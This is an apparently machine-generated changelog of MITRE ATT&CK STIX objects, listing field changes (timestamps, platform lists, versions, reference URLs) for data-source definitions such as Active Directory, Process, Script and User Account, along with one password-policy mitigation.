| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-06-10 20:53:36.319000+00:00 | 2022-10-21 15:52:06.295000+00:00 |
| Description |
|---|
| Set and enforce secure password policies for accounts. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-06-06 21:10:35.792000+00:00 | 2022-10-21 15:52:23.327000+00:00 |
| Description |
|---|
| A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Azure AD | Windows |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.274110Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.693951Z | 2022-03-30T14:26:51.803Z |
| Description |
|---|
| Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Google Workspace |
| x_mitre_platforms[1] | Linux | IaaS |
| x_mitre_platforms[2] | macOS | Linux |
| x_mitre_platforms[3] | IaaS | Office 365 |
| x_mitre_platforms[5] | Office 365 | Windows |
| x_mitre_platforms[6] | Google Workspace | macOS |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.272925Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272925Z | 2022-05-11T14:00:00.188Z |
| Description |
|---|
| A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275410Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275410Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | IaaS | Azure AD |
| x_mitre_platforms[1] | SaaS | Google Workspace |
| x_mitre_platforms[2] | Office 365 | IaaS |
| x_mitre_platforms[3] | Azure AD | Office 365 |
| x_mitre_platforms[4] | Google Workspace | SaaS |
| created | 2021-10-20T15:05:19.273990Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.694425Z | 2022-03-30T14:26:51.804Z |
| Description |
|---|
| Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272382Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.694594Z | 2021-11-10T09:30:48.694Z |
| Description |
|---|
| A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.694901Z | 2022-10-21T15:55:31.986Z |
| x_mitre_platforms[0] | Windows | Containers |
| x_mitre_platforms[2] | macOS | Network |
| x_mitre_platforms[3] | Network | Windows |
| x_mitre_platforms[4] | Containers | macOS |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_contributors[0] | Austin Clark | Center for Threat-Informed Defense (CTID) |
| x_mitre_contributors[1] | Center for Threat-Informed Defense (CTID) | Austin Clark, @c2defense |
| x_mitre_collection_layers[0] | Host | Container |
| x_mitre_collection_layers[1] | Container | Host |
| created | 2021-10-20T15:05:19.273124Z | 2021-10-20T15:05:19.273Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0017 | https://attack.mitre.org/data-sources/DS0017 |
| Description |
|---|
| A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274834Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.694982Z | 2021-11-10T09:30:48.694Z |
| Description |
|---|
| Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275460Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275460Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.272982Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.695272Z | 2022-03-30T14:26:51.804Z |
| Description |
|---|
| A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[1] | macOS | Windows |
| x_mitre_platforms[2] | Windows | macOS |
| created | 2021-10-20T15:05:19.274252Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.695431Z | 2022-03-30T14:26:51.805Z |
| Old Description | New Description |
|---|---|
| A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)(Citation: Microsoft File Mgmt) | A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Network |
| x_mitre_platforms[2] | macOS | Windows |
| x_mitre_platforms[3] | Network | macOS |
| created | 2021-10-20T15:05:19.273672Z | 2021-10-20T15:05:19.273Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0022 | https://attack.mitre.org/data-sources/DS0022 |
| description | A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)(Citation: Microsoft File Mgmt) | A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt) |
| modified | 2021-11-10T09:30:48.695560Z | 2022-04-21T14:50:59.123Z |
| Description |
|---|
| A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | IaaS | Azure AD |
| x_mitre_platforms[1] | SaaS | Google Workspace |
| x_mitre_platforms[2] | Office 365 | IaaS |
| x_mitre_platforms[3] | Azure AD | Linux |
| x_mitre_platforms[4] | Linux | Office 365 |
| x_mitre_platforms[5] | macOS | SaaS |
| x_mitre_platforms[7] | Google Workspace | macOS |
| created | 2021-10-20T15:05:19.273181Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.695762Z | 2022-03-30T14:26:51.805Z |
| Description |
|---|
| Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.265145Z | 2021-10-20T15:05:19.265Z |
| modified | 2021-11-10T09:30:48.695921Z | 2022-03-30T14:26:51.805Z |
| Description |
|---|
| A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | IaaS | Google Workspace |
| x_mitre_platforms[2] | SaaS | IaaS |
| x_mitre_platforms[4] | Azure AD | SaaS |
| x_mitre_platforms[5] | Google Workspace | Windows |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.275275Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-11-10T09:30:48.695999Z | 2022-03-30T14:26:51.805Z |
| Description |
|---|
| A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271956Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-11-10T09:30:48.696179Z | 2021-11-10T09:30:48.696Z |
| Description |
|---|
| A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274538Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274538Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275202Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275202Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272087Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.696693Z | 2021-11-10T09:30:48.696Z |
| Old Description | New Description |
|---|---|
| Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorizaton(Citation: Microsoft Audit Logon Events) | Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.696771Z | 2022-10-21T15:56:16.481Z |
| description | Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorizaton(Citation: Microsoft Audit Logon Events) | Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events) |
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Linux | Google Workspace |
| x_mitre_platforms[2] | macOS | IaaS |
| x_mitre_platforms[3] | IaaS | Linux |
| x_mitre_platforms[4] | SaaS | Office 365 |
| x_mitre_platforms[5] | Office 365 | SaaS |
| x_mitre_platforms[6] | Azure AD | Windows |
| x_mitre_platforms[7] | Google Workspace | macOS |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274352Z | 2021-10-20T15:05:19.274Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0028 | https://attack.mitre.org/data-sources/DS0028 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| Description |
|---|
| Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271698Z | 2022-10-20T20:20:36.693Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271698Z | 2021-10-20T15:05:19.271Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0004 | https://attack.mitre.org/data-sources/DS0004 |
| Description |
|---|
| Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.272552Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.697073Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.273816Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.697149Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.274950Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.697227Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.697365Z | 2022-10-20T20:18:34.334Z |
| x_mitre_platforms[0] | Windows | IaaS |
| x_mitre_platforms[2] | macOS | Windows |
| x_mitre_platforms[3] | IaaS | macOS |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274446Z | 2021-10-20T15:05:19.274Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0029 | https://attack.mitre.org/data-sources/DS0029 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| Description |
|---|
| A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273623Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273623Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272712Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.697559Z | 2021-11-10T09:30:48.697Z |
| Description |
|---|
| Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.697770Z | 2022-10-21T15:58:32.516Z |
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272143Z | 2021-10-20T15:05:19.272Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0009 | https://attack.mitre.org/data-sources/DS0009 |
| Description |
|---|
| Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Containers |
| x_mitre_platforms[2] | macOS | Windows |
| x_mitre_platforms[3] | Containers | macOS |
| x_mitre_collection_layers[0] | Host | Container |
| x_mitre_collection_layers[1] | Container | Host |
| created | 2021-10-20T15:05:19.271574Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-11-10T09:30:48.697992Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.698144Z | 2022-10-21T15:58:58.335Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272610Z | 2021-10-20T15:05:19.272Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0012 | https://attack.mitre.org/data-sources/DS0012 |
| external_references[1]['source_name'] | Microsoft PowerShell Logging | FireEye PowerShell Logging |
| external_references[1]['description'] | Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021. | Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7 | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html |
| external_references[2]['source_name'] | FireEye PowerShell Logging | Microsoft AMSI |
| external_references[2]['description'] | Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021. | Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html | https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal |
| external_references[3]['source_name'] | Microsoft AMSI | Microsoft PowerShell Logging |
| external_references[3]['description'] | Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021. | Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7 |
| Description |
|---|
| Information from host telemetry providing insights about system status, errors, or other notable functional activity |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.698218Z | 2022-10-20T20:22:52.060Z |
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272664Z | 2021-10-20T15:05:19.272Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0013 | https://attack.mitre.org/data-sources/DS0013 |
| Description |
|---|
| A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.273300Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.698295Z | 2022-03-30T14:26:51.807Z |
| Description |
|---|
| A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273471Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.698426Z | 2021-11-10T09:30:48.698Z |
| Description |
|---|
| A profile representing a user, device, service, or application used to authenticate and access resources |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.698605Z | 2022-10-21T15:59:59.646Z |
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Linux | Containers |
| x_mitre_platforms[2] | macOS | Google Workspace |
| x_mitre_platforms[4] | SaaS | Linux |
| x_mitre_platforms[6] | Azure AD | SaaS |
| x_mitre_platforms[7] | Containers | Windows |
| x_mitre_platforms[8] | Google Workspace | macOS |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271422Z | 2021-10-20T15:05:19.271Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0002 | https://attack.mitre.org/data-sources/DS0002 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Host |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Host |
| Description |
|---|
